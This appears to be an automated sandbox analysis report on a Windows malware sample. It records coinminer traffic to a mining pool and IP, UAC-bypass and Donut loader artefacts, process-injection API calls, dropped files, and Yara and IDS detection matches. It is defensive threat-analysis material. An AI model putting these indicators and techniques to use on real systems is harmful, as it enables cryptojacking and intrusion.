Windows Analysis Report
GcqJPBLD2Q.exe

Malicious sample detected (through community Yara rule)

Source: Joe Sandbox View

IP Address: 45.76.89.70 45.76.89.70

Source: Joe Sandbox View

ASN Name: AS-CHOOPAUS AS-CHOOPAUS

Source: Network traffic	Suricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.6:49617 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.6:49759 -> 45.76.89.70:80

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: pool.hashvault.pro

Source: conhost.exe, 0000000E.00000002.2261430529.000001EC46AF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/ObjectSign.crl0
Source: conhost.exe, 0000000E.00000002.2261430529.000001EC46AF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/Root.crl0
Source: conhost.exe, 0000000E.00000002.2261430529.000001EC46AF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/RootSignPartners.crl0
Source: conhost.exe, 0000000E.00000002.2261430529.000001EC46AF1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/primobject.crl0
Source: powershell.exe, 00000002.00000002.2367096703.00000151D50D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.2291247009.00000151C5288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.2291247009.00000151C5288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: powershell.exe, 00000002.00000002.2291247009.00000151C5061000.00000004.00000800.00020000.00000000.sdmp, conhost.exe, 00000007.00000002.2190959451.00000236C70F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.2291247009.00000151C5288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
Source: powershell.exe, 00000002.00000002.2291247009.00000151C5288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.2291247009.00000151C5061000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000002.00000002.2367096703.00000151D50D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.2367096703.00000151D50D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.2367096703.00000151D50D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.2291247009.00000151C5288000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.2367096703.00000151D50D0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: conhost.exe, 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2218560312.000002476943E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2238560339.0000024769435000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2237491368.0000024769430000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2265143646.0000024769433000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2261244602.000002476943C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2246350754.0000024769436000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2257958978.000002476943B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2262725045.0000024769431000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2236720791.0000024769432000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2239521563.000002476943F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2231606755.0000024769434000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2266356078.0000024769438000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2240379880.000002476943D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/benchmark/%s
Source: conhost.exe, 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2218560312.000002476943E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2238560339.0000024769435000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2237491368.0000024769430000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2265143646.0000024769433000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2261244602.000002476943C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2246350754.0000024769436000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2257958978.000002476943B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2262725045.0000024769431000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2236720791.0000024769432000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2239521563.000002476943F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2231606755.0000024769434000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2266356078.0000024769438000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2240379880.000002476943D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/docs/algorithms
Source: conhost.exe, 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2218560312.000002476943E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2238560339.0000024769435000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2237491368.0000024769430000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2265143646.0000024769433000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2261244602.000002476943C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2246350754.0000024769436000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2257958978.000002476943B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2262725045.0000024769431000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2236720791.0000024769432000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2239521563.000002476943F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2231606755.0000024769434000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2266356078.0000024769438000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2240379880.000002476943D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard
Source: conhost.exe, 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2218560312.000002476943E000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2238560339.0000024769435000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2237491368.0000024769430000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2265143646.0000024769433000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2261244602.000002476943C000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2246350754.0000024769436000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2257958978.000002476943B000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2262725045.0000024769431000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2236720791.0000024769432000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2239521563.000002476943F000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2231606755.0000024769434000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2266356078.0000024769438000.00000004.00000020.00020000.00000000.sdmp, conhost.exe, 00000010.00000003.2240379880.000002476943D000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://xmrig.com/wizard%s

System Summary

Source: 0.2.GcqJPBLD2Q.exe.35f5ad0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 5.0.DccwBypassUAC.exe.7ff6fe420000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.GcqJPBLD2Q.exe.35e1868.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.GcqJPBLD2Q.exe.3609d68.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 0.2.GcqJPBLD2Q.exe.35e1868.1.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 5.2.DccwBypassUAC.exe.7ff6fe420000.0.unpack, type: UNPACKEDPE	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
Source: 00000012.00000002.2234389210.0000025C64110000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000012.00000002.2234389210.0000025C64110000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000016.00000002.2255998341.000001D90D160000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000016.00000002.2255998341.000001D90D160000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000018.00000002.2249781552.0000000000845000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000018.00000002.2249781552.0000000000845000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000014.00000002.2235023601.0000000000A8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000014.00000002.2235023601.0000000000A8C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000010.00000003.2255180923.0000024769437000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2218560312.000002476943E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2265143646.0000024769433000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2238560339.0000024769435000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000007.00000002.2189995465.00000236C4F60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000007.00000002.2189995465.00000236C4F60000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000010.00000003.2261244602.000002476943C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2237491368.0000024769430000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000011.00000002.2211357524.0000000000825000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000011.00000002.2211357524.0000000000825000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000010.00000003.2246350754.0000024769436000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000017.00000002.2257559925.0000000000925000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000017.00000002.2257559925.0000000000925000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000000F.00000002.2198853521.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000F.00000002.2198853521.0000000000AA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 0000000E.00000002.2259611805.000001EC44910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000E.00000002.2259611805.000001EC44910000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000010.00000003.2257958978.000002476943B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2262725045.0000024769431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2236720791.0000024769432000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 0000000C.00000002.2213477315.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 0000000C.00000002.2213477315.0000000000B97000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000010.00000003.2242162134.0000024769431000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2232579749.0000024769436000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2239521563.000002476943F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000004.00000002.2151276225.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
Source: 00000004.00000002.2151276225.0000000000AB6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d Author: unknown
Source: 00000010.00000003.2263942655.0000024769433000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2260012653.0000024769436000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2231606755.0000024769434000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2244730823.000002476943C000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2266356078.0000024769438000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2230448544.0000024769438000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2243392476.000002476943F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2241271993.000002476943F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2256496200.0000024769432000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2240379880.000002476943D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: 00000010.00000003.2220629227.0000024769433000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: Process Memory Space: conhost.exe PID: 2848, type: MEMORYSTR	Matched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe, type: DROPPED	Matched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth

Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Code function: 4_2_00401D58 NtAllocateVirtualMemory,	4_2_00401D58
Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Code function: 4_2_00401D18 NtWriteVirtualMemory,	4_2_00401D18
Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Code function: 4_2_004019D8 NtCreateThreadEx,	4_2_004019D8
Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Code function: 4_2_00401D98 NtProtectVirtualMemory,	4_2_00401D98
Source: C:\Users\user\AppData\Local\Temp\Cool.exe	Code function: 4_2_00401C98 NtClose,	4_2_00401C98
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Code function: 17_2_00401D58 NtAllocateVirtualMemory,	17_2_00401D58
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Code function: 17_2_00401D18 NtWriteVirtualMemory,	17_2_00401D18
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Code function: 17_2_004019D8 NtCreateThreadEx,	17_2_004019D8
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Code function: 17_2_00401D98 NtProtectVirtualMemory,	17_2_00401D98
Source: C:\Users\user\AppData\Roaming\Microsoft\Libs\sihost64.exe	Code function: 17_2_00401C98 NtClose,	17_2_00401C98

Source: C:\Windows\System32\conhost.exe

File created: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys

Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Code function: 0_2_00007FFD343F089D	0_2_00007FFD343F089D
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Code function: 0_2_00007FFD343F0568	0_2_00007FFD343F0568
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Code function: 0_2_00007FFD343F0B40	0_2_00007FFD343F0B40
Source: C:\Users\user\Desktop\GcqJPBLD2Q.exe	Code function: 0_2_00007FFD343F0500	0_2_00007FFD343F0500
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD343EACFA	2_2_00007FFD343EACFA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD343E2108	2_2_00007FFD343E2108
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD343EB9BA	2_2_00007FFD343EB9BA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD343EAD83	2_2_00007FFD343EAD83
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Code function: 2_2_00007FFD343EBAFA	2_2_00007FFD343EBAFA
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Code function: 5_2_00007FF6FE422F80	5_2_00007FF6FE422F80
Source: C:\Users\user\AppData\Local\Temp\DccwBypassUAC.exe	Code function: 5_2_00007FF6FE421CB0	5_2_00007FF6FE421CB0
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_00000236C517E306	7_2_00000236C517E306
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_00000236C517E6D6	7_2_00000236C517E6D6
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_00000236C517EB0E	7_2_00000236C517EB0E
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_00000236C517D6D2	7_2_00000236C517D6D2
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_00000236C517EF6A	7_2_00000236C517EF6A
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_00007FFD344A5EA2	7_2_00007FFD344A5EA2
Source: C:\Windows\System32\conhost.exe	Code function: 7_2_00007FFD344A50F6	7_2_00007FFD344A50F6
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_000001EC44B2E6D6	14_2_000001EC44B2E6D6
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_000001EC44B2E306	14_2_000001EC44B2E306
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_000001EC44B2EF6A	14_2_000001EC44B2EF6A
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_000001EC44B2EB0E	14_2_000001EC44B2EB0E
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_000001EC44B2D6D2	14_2_000001EC44B2D6D2
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00007FFD344A516C	14_2_00007FFD344A516C
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00007FFD344A5F1C	14_2_00007FFD344A5F1C
Source: C:\Windows\System32\conhost.exe	Code function: 14_2_00007FFD344A159D	14_2_00007FFD344A159D
Source: C:\Windows\System32\conhost.exe	Code function: 18_2_0000025C641148D6	18_2_0000025C641148D6
Source: C:\Windows\System32\conhost.exe	Code function: 18_2_0000025C64114506	18_2_0000025C64114506
Source: C:\Windows\System32\conhost.exe	Code function: 18_2_0000025C6411516A	18_2_0000025C6411516A
Source: C:\Windows\System32\conhost.exe	Code function: 18_2_0000025C64114D0E	18_2_0000025C64114D0E
Source: C:\Windows\System32\conhost.exe	Code function: 18_2_0000025C641138D2	18_2_0000025C641138D2
Source: C:\Windows\System32\conhost.exe	Code function: 18_2_00007FFD344941A6	18_2_00007FFD344941A6
Source: C:\Windows\System32\conhost.exe	Code function: 18_2_00007FFD34494F52	18_2_00007FFD34494F52
Source: C:\Windows\System32\conhost.exe	Code function: 18_2_00007FFD34493CA9	18_2_00007FFD34493CA9
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_000001D90D37E6D6	22_2_000001D90D37E6D6
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_000001D90D37E306	22_2_000001D90D37E306
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_000001D90D37EF6A	22_2_000001D90D37EF6A
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_000001D90D37D6D2	22_2_000001D90D37D6D2
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_000001D90D37EB0E	22_2_000001D90D37EB0E
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_00007FFD344A5EA2	22_2_00007FFD344A5EA2
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_00007FFD344A50F6	22_2_00007FFD344A50F6
Source: C:\Windows\System32\conhost.exe	Code function: 22_2_00007FFD344A159D	22_2_00007FFD344A159D

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Roaming\Microsoft\Libs\WR64.sys 11BD2C9F9E2397C9A16E0990E4ED2CF0679498FE0FD418A3DFDAC60B5C160EE5

Source: C:\Windows\System32\svchost.exe

Process created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -pss -s 432 -p 6012 -ip 6012

Source: GcqJPBLD2Q.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: 0.2.GcqJPBLD2Q.exe.35f5ad0.2.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 5.0.DccwBypassUAC.exe.7ff6fe420000.0.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.GcqJPBLD2Q.exe.35e1868.1.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.GcqJPBLD2Q.exe.3609d68.3.raw.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 0.2.GcqJPBLD2Q.exe.35e1868.1.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 5.2.DccwBypassUAC.exe.7ff6fe420000.0.unpack, type: UNPACKEDPE	Matched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
Source: 00000012.00000002.2234389210.0000025C64110000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000012.00000002.2234389210.0000025C64110000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 00000016.00000002.2255998341.000001D90D160000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
Source: 00000016.00000002.2255998341.000001D90D160000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_5c38878d os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 3b55ec6c37891880b53633b936d10f94d2b806db1723875e4ac95f8a34d97150, id = 5c38878d-ca94-4fd9-a36e-1ae5fe713ca2, last_modified = 2021-01-13
Source: 00000018.00000002.2249781552.0000000000845000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
